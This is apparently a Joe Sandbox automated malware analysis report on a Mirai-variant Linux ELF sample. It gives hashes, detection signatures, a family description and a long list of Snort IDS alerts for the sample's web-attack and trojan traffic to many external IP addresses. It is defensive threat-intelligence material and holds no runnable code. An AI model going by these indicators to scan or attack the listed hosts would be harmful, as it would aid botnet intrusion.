Create Interactive Tour

Linux Analysis Report
uR2hnJKQGC.elf

Overview

General Information

Sample name:uR2hnJKQGC.elf
renamed because original name is a hash value
Original sample name:926c4d6271ff789f1b7869fc177e499c.elf
Analysis ID:1391982
MD5:926c4d6271ff789f1b7869fc177e499c
SHA1:2159fc1cc9637faa0eb07ba90c92f7f8036b0cdf
SHA256:24fd0b5356f7ee751cc3a2746ea6da9a273e5771c6b9708a146f38b766f63ce8
Tags:32elfmiraimotorola
Infos:

Detection

Mirai
Score:88
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Detected Mirai
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Mirai
Sample tries to kill multiple processes (SIGKILL)
Uses known network protocols on non-standard ports
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
HTTP GET or POST without a user agent
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample listens on a socket
Sample tries to kill a process (SIGKILL)
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious

Analysis Advice

Some HTTP requests failed (404). It is likely that the sample will exhibit less behavior.
Static ELF header machine description suggests that the sample might not execute correctly on this machine.
Joe Sandbox version:40.0.0 Tourmaline
Analysis ID:1391982
Start date and time:2024-02-14 09:26:32 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 7m 10s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:uR2hnJKQGC.elf
renamed because original name is a hash value
Original Sample Name:926c4d6271ff789f1b7869fc177e499c.elf
Detection:MAL
Classification:mal88.spre.troj.linELF@0/0@0/0
  • Report size exceeded maximum capacity and may have missing network information.
Command:/tmp/uR2hnJKQGC.elf
PID:6269
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
Infected By Cult
Standard Error:
  • system is lnxubuntu20
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Mirai_12Yara detected MiraiJoe Security
    Timestamp:192.168.2.2395.101.158.8753412802839471 02/14/24-09:29:15.514077
    SID:2839471
    Source Port:53412
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.82.235.4655394802839471 02/14/24-09:29:56.185100
    SID:2839471
    Source Port:55394
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.213.219.1044546802839471 02/14/24-09:28:41.269000
    SID:2839471
    Source Port:44546
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2388.221.204.5255838802839471 02/14/24-09:28:52.970445
    SID:2839471
    Source Port:55838
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2388.218.157.22458618802839471 02/14/24-09:30:18.595832
    SID:2839471
    Source Port:58618
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.58.97.25354036802839471 02/14/24-09:28:41.518311
    SID:2839471
    Source Port:54036
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2388.93.162.4235652802839471 02/14/24-09:30:21.598092
    SID:2839471
    Source Port:35652
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.161.184.15854296802839471 02/14/24-09:28:00.940453
    SID:2839471
    Source Port:54296
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.23112.155.109.1046040802839471 02/14/24-09:29:27.796858
    SID:2839471
    Source Port:46040
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2388.208.41.9647320802839471 02/14/24-09:28:37.792758
    SID:2839471
    Source Port:47320
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.86.119.22060502802839471 02/14/24-09:29:40.536815
    SID:2839471
    Source Port:60502
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.23112.213.117.1047128802839471 02/14/24-09:29:05.894404
    SID:2839471
    Source Port:47128
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.250.222.2237234802839471 02/14/24-09:29:18.314666
    SID:2839471
    Source Port:37234
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.101.215.16933032802839471 02/14/24-09:28:10.720737
    SID:2839471
    Source Port:33032
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.23112.178.184.12939216802839471 02/14/24-09:29:28.079170
    SID:2839471
    Source Port:39216
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.213.203.3437292802839471 02/14/24-09:27:45.924535
    SID:2839471
    Source Port:37292
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.23112.12.91.12451818802839471 02/14/24-09:30:12.699003
    SID:2839471
    Source Port:51818
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.23197.214.103.17450032372152835222 02/14/24-09:29:39.586861
    SID:2835222
    Source Port:50032
    Destination Port:37215
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.9.78.22752802802839471 02/14/24-09:28:06.861420
    SID:2839471
    Source Port:52802
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2388.170.210.21855808802839471 02/14/24-09:28:53.175369
    SID:2839471
    Source Port:55808
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.100.54.1547280802839471 02/14/24-09:29:46.109060
    SID:2839471
    Source Port:47280
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.211.144.7955208802839471 02/14/24-09:29:55.853223
    SID:2839471
    Source Port:55208
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.23112.30.176.8637432802839471 02/14/24-09:30:11.242004
    SID:2839471
    Source Port:37432
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.100.81.19941186802839471 02/14/24-09:30:18.787133
    SID:2839471
    Source Port:41186
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.86.86.2741196802839471 02/14/24-09:30:25.558950
    SID:2839471
    Source Port:41196
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2388.99.253.24759222802839471 02/14/24-09:28:53.175062
    SID:2839471
    Source Port:59222
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.128.144.3758408802839471 02/14/24-09:29:18.517066
    SID:2839471
    Source Port:58408
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.23112.197.68.11034286802839471 02/14/24-09:28:51.397470
    SID:2839471
    Source Port:34286
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.163.238.16649336802839471 02/14/24-09:30:14.281752
    SID:2839471
    Source Port:49336
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.182.152.6858572802839471 02/14/24-09:30:25.517305
    SID:2839471
    Source Port:58572
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.23112.74.44.2834200802839471 02/14/24-09:29:00.504761
    SID:2839471
    Source Port:34200
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.23112.126.222.18240710802839471 02/14/24-09:29:52.364895
    SID:2839471
    Source Port:40710
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.101.83.2655252802839471 02/14/24-09:29:53.093051
    SID:2839471
    Source Port:55252
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2388.221.180.21459274802839471 02/14/24-09:30:15.991456
    SID:2839471
    Source Port:59274
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.23112.74.1.22244164802839471 02/14/24-09:27:52.719402
    SID:2839471
    Source Port:44164
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.179.188.23958322802839471 02/14/24-09:28:13.876981
    SID:2839471
    Source Port:58322
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2388.135.68.19349062802839471 02/14/24-09:28:35.079548
    SID:2839471
    Source Port:49062
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2388.195.136.19432944802839471 02/14/24-09:28:53.179772
    SID:2839471
    Source Port:32944
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2388.149.218.24251530802839471 02/14/24-09:29:45.439034
    SID:2839471
    Source Port:51530
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.163.53.13458714802839471 02/14/24-09:27:55.239492
    SID:2839471
    Source Port:58714
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.23112.125.217.15846366802839471 02/14/24-09:29:52.366517
    SID:2839471
    Source Port:46366
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.131.48.10156592802839471 02/14/24-09:29:09.033559
    SID:2839471
    Source Port:56592
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2388.84.193.10339682802839471 02/14/24-09:27:53.206199
    SID:2839471
    Source Port:39682
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.23112.74.74.6038712802839471 02/14/24-09:27:53.323820
    SID:2839471
    Source Port:38712
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.23112.74.62.9239116802839471 02/14/24-09:29:48.442242
    SID:2839471
    Source Port:39116
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.57.133.11037876802839471 02/14/24-09:27:59.359606
    SID:2839471
    Source Port:37876
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.100.0.6847298802839471 02/14/24-09:30:11.853194
    SID:2839471
    Source Port:47298
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.101.50.433220802839471 02/14/24-09:29:51.909181
    SID:2839471
    Source Port:33220
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.23112.17.55.2438966802839471 02/14/24-09:29:59.330736
    SID:2839471
    Source Port:38966
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.100.118.11533342802839471 02/14/24-09:29:32.948024
    SID:2839471
    Source Port:33342
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2388.221.39.3449040802839471 02/14/24-09:30:19.010347
    SID:2839471
    Source Port:49040
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.217.156.15644912802839471 02/14/24-09:29:18.302660
    SID:2839471
    Source Port:44912
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.100.66.9952802802839471 02/14/24-09:29:51.800966
    SID:2839471
    Source Port:52802
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.86.103.16446688802839471 02/14/24-09:30:13.103742
    SID:2839471
    Source Port:46688
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.142.165.18154690802839471 02/14/24-09:28:10.698748
    SID:2839471
    Source Port:54690
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.216.26.9142096802839471 02/14/24-09:29:53.115648
    SID:2839471
    Source Port:42096
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2388.99.135.23057666802839471 02/14/24-09:29:15.699928
    SID:2839471
    Source Port:57666
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.38.51.6541086802839471 02/14/24-09:29:24.030716
    SID:2839471
    Source Port:41086
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.111.216.16138552802839471 02/14/24-09:28:33.007962
    SID:2839471
    Source Port:38552
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.164.33.8460332802839471 02/14/24-09:30:11.455726
    SID:2839471
    Source Port:60332
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.23197.49.98.16650630372152829579 02/14/24-09:30:10.064640
    SID:2829579
    Source Port:50630
    Destination Port:37215
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23112.46.49.15942870802839471 02/14/24-09:28:22.798197
    SID:2839471
    Source Port:42870
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.165.192.20640378802839471 02/14/24-09:29:40.530705
    SID:2839471
    Source Port:40378
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2388.174.236.23334662802839471 02/14/24-09:28:14.083882
    SID:2839471
    Source Port:34662
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2388.221.154.9159104802839471 02/14/24-09:30:07.610728
    SID:2839471
    Source Port:59104
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2388.19.69.14642778802839471 02/14/24-09:29:21.153084
    SID:2839471
    Source Port:42778
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.104.244.15241336802839471 02/14/24-09:30:13.079555
    SID:2839471
    Source Port:41336
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.56.126.7343212802839471 02/14/24-09:30:13.270714
    SID:2839471
    Source Port:43212
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.0.232.4651552802839471 02/14/24-09:28:10.755296
    SID:2839471
    Source Port:51552
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.100.62.12755576802839471 02/14/24-09:28:39.763924
    SID:2839471
    Source Port:55576
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2388.122.72.24841540802839471 02/14/24-09:27:54.886606
    SID:2839471
    Source Port:41540
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.23197.49.60.13150368372152829579 02/14/24-09:28:05.512318
    SID:2829579
    Source Port:50368
    Destination Port:37215
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.211.206.15245432802839471 02/14/24-09:28:19.729577
    SID:2839471
    Source Port:45432
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2388.198.21.24834980802839471 02/14/24-09:29:06.099416
    SID:2839471
    Source Port:34980
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2388.164.157.7159356802839471 02/14/24-09:28:37.804076
    SID:2839471
    Source Port:59356
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.82.231.19051014802839471 02/14/24-09:28:47.397000
    SID:2839471
    Source Port:51014
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.9.93.1755520802839471 02/14/24-09:29:08.651385
    SID:2839471
    Source Port:55520
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2388.248.111.20143080802839471 02/14/24-09:30:18.650489
    SID:2839471
    Source Port:43080
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.23112.13.125.2658594802839471 02/14/24-09:28:47.559680
    SID:2839471
    Source Port:58594
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.217.68.12340044802839471 02/14/24-09:28:19.975423
    SID:2839471
    Source Port:40044
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.100.72.9540486802839471 02/14/24-09:28:32.588379
    SID:2839471
    Source Port:40486
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.143.177.1260590802839471 02/14/24-09:30:14.259569
    SID:2839471
    Source Port:60590
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2388.221.242.6358984802839471 02/14/24-09:28:50.650445
    SID:2839471
    Source Port:58984
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2388.148.64.10350670802839471 02/14/24-09:30:16.028102
    SID:2839471
    Source Port:50670
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.58.73.8151660802839471 02/14/24-09:29:46.404945
    SID:2839471
    Source Port:51660
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.85.47.25040170802839471 02/14/24-09:28:32.587179
    SID:2839471
    Source Port:40170
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.23197.49.60.13150368372152835222 02/14/24-09:28:05.512318
    SID:2835222
    Source Port:50368
    Destination Port:37215
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.217.224.3037284802839471 02/14/24-09:29:09.043795
    SID:2839471
    Source Port:37284
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.101.6.18251602802839471 02/14/24-09:28:29.512375
    SID:2839471
    Source Port:51602
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.101.202.7742220802839471 02/14/24-09:29:46.101370
    SID:2839471
    Source Port:42220
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.23197.49.98.16650630372152835222 02/14/24-09:30:10.064640
    SID:2835222
    Source Port:50630
    Destination Port:37215
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2388.87.90.9736698802839471 02/14/24-09:28:37.625304
    SID:2839471
    Source Port:36698
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.23112.74.217.20643644802839471 02/14/24-09:30:13.693546
    SID:2839471
    Source Port:43644
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.100.52.22948296802839471 02/14/24-09:30:14.254227
    SID:2839471
    Source Port:48296
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.23112.166.253.25052442802839471 02/14/24-09:29:55.647756
    SID:2839471
    Source Port:52442
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.23112.221.197.2642412802839471 02/14/24-09:28:06.593965
    SID:2839471
    Source Port:42412
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.23112.80.252.25344570802839471 02/14/24-09:29:20.925726
    SID:2839471
    Source Port:44570
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.154.252.12659664802839471 02/14/24-09:28:13.866267
    SID:2839471
    Source Port:59664
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.58.255.23059450802839471 02/14/24-09:29:47.700385
    SID:2839471
    Source Port:59450
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2388.130.182.12835164802839471 02/14/24-09:28:53.421997
    SID:2839471
    Source Port:35164
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.23112.51.126.12033588802839471 02/14/24-09:27:59.104332
    SID:2839471
    Source Port:33588
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.110.197.20738746802839471 02/14/24-09:30:21.793447
    SID:2839471
    Source Port:38746
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.23112.124.185.18338972802839471 02/14/24-09:27:44.347060
    SID:2839471
    Source Port:38972
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.217.6.23844880802839471 02/14/24-09:28:10.731022
    SID:2839471
    Source Port:44880
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.23112.140.38.7539726802839471 02/14/24-09:30:04.882118
    SID:2839471
    Source Port:39726
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.23112.47.11.4154508802839471 02/14/24-09:29:20.940885
    SID:2839471
    Source Port:54508
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.23112.48.244.5439996802839471 02/14/24-09:29:01.251221
    SID:2839471
    Source Port:39996
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.217.66.241626802839471 02/14/24-09:29:58.688282
    SID:2839471
    Source Port:41626
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.23112.184.44.9748426802839471 02/14/24-09:30:00.275215
    SID:2839471
    Source Port:48426
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.111.240.24942560802839471 02/14/24-09:28:04.032282
    SID:2839471
    Source Port:42560
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2388.99.239.1844720802839471 02/14/24-09:28:16.951107
    SID:2839471
    Source Port:44720
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.100.58.7341654802839471 02/14/24-09:27:59.276834
    SID:2839471
    Source Port:41654
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.218.216.21641042802839471 02/14/24-09:29:51.879385
    SID:2839471
    Source Port:41042
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.217.229.22655252802839471 02/14/24-09:28:23.339229
    SID:2839471
    Source Port:55252
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2388.214.19.7555598802839471 02/14/24-09:28:25.849010
    SID:2839471
    Source Port:55598
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.23112.186.102.15345696802839471 02/14/24-09:29:55.379215
    SID:2839471
    Source Port:45696
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.215.240.13636028802839471 02/14/24-09:29:04.265978
    SID:2839471
    Source Port:36028
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.23112.213.32.14850220802839471 02/14/24-09:28:57.839426
    SID:2839471
    Source Port:50220
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2388.153.80.13038604802839471 02/14/24-09:28:37.589491
    SID:2839471
    Source Port:38604
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.100.228.19039598802839471 02/14/24-09:29:32.743923
    SID:2839471
    Source Port:39598
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2388.218.224.11034674802839471 02/14/24-09:28:42.006547
    SID:2839471
    Source Port:34674
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.216.104.5241186802839471 02/14/24-09:29:29.877845
    SID:2839471
    Source Port:41186
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.132.214.9547258802839471 02/14/24-09:28:23.357066
    SID:2839471
    Source Port:47258
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.23197.246.141.1752504372152835222 02/14/24-09:29:33.287791
    SID:2835222
    Source Port:52504
    Destination Port:37215
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.101.243.20046154802839471 02/14/24-09:28:37.991051
    SID:2839471
    Source Port:46154
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.171.107.17459238802839471 02/14/24-09:29:15.514216
    SID:2839471
    Source Port:59238
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.163.56.16933970802839471 02/14/24-09:29:46.127571
    SID:2839471
    Source Port:33970
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.216.92.7547084802839471 02/14/24-09:28:32.605835
    SID:2839471
    Source Port:47084
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.107.144.23546716802839471 02/14/24-09:29:08.828010
    SID:2839471
    Source Port:46716
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.126.76.3251778802839471 02/14/24-09:29:58.979071
    SID:2839471
    Source Port:51778
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.23112.74.44.16641044802839471 02/14/24-09:29:36.083467
    SID:2839471
    Source Port:41044
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2388.209.228.21534142802839471 02/14/24-09:28:53.188656
    SID:2839471
    Source Port:34142
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.217.178.21039922802839471 02/14/24-09:29:53.106752
    SID:2839471
    Source Port:39922
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2388.198.7.1656718802839471 02/14/24-09:28:25.812419
    SID:2839471
    Source Port:56718
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.23112.12.91.12451820802839471 02/14/24-09:30:13.714899
    SID:2839471
    Source Port:51820
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2388.221.37.5344592802839471 02/14/24-09:29:40.979447
    SID:2839471
    Source Port:44592
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.23112.173.228.22646472802839471 02/14/24-09:28:11.083217
    SID:2839471
    Source Port:46472
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.57.5.10737456802839471 02/14/24-09:28:38.255169
    SID:2839471
    Source Port:37456
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.100.76.23547608802839471 02/14/24-09:28:41.232002
    SID:2839471
    Source Port:47608
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.57.202.9333860802839471 02/14/24-09:30:19.055564
    SID:2839471
    Source Port:33860
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.72.216.738270802839471 02/14/24-09:28:32.922928
    SID:2839471
    Source Port:38270
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.216.234.9454082802839471 02/14/24-09:29:51.818652
    SID:2839471
    Source Port:54082
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2388.15.81.17952268802839471 02/14/24-09:28:53.395085
    SID:2839471
    Source Port:52268
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.57.131.2860980802839471 02/14/24-09:29:12.964638
    SID:2839471
    Source Port:60980
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.158.56.22043926802839471 02/14/24-09:27:55.237395
    SID:2839471
    Source Port:43926
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.0.213.6951232802839471 02/14/24-09:29:58.713858
    SID:2839471
    Source Port:51232
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.154.17.16637460802839471 02/14/24-09:30:21.782373
    SID:2839471
    Source Port:37460
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.2395.100.246.15735116802839471 02/14/24-09:29:08.981352
    SID:2839471
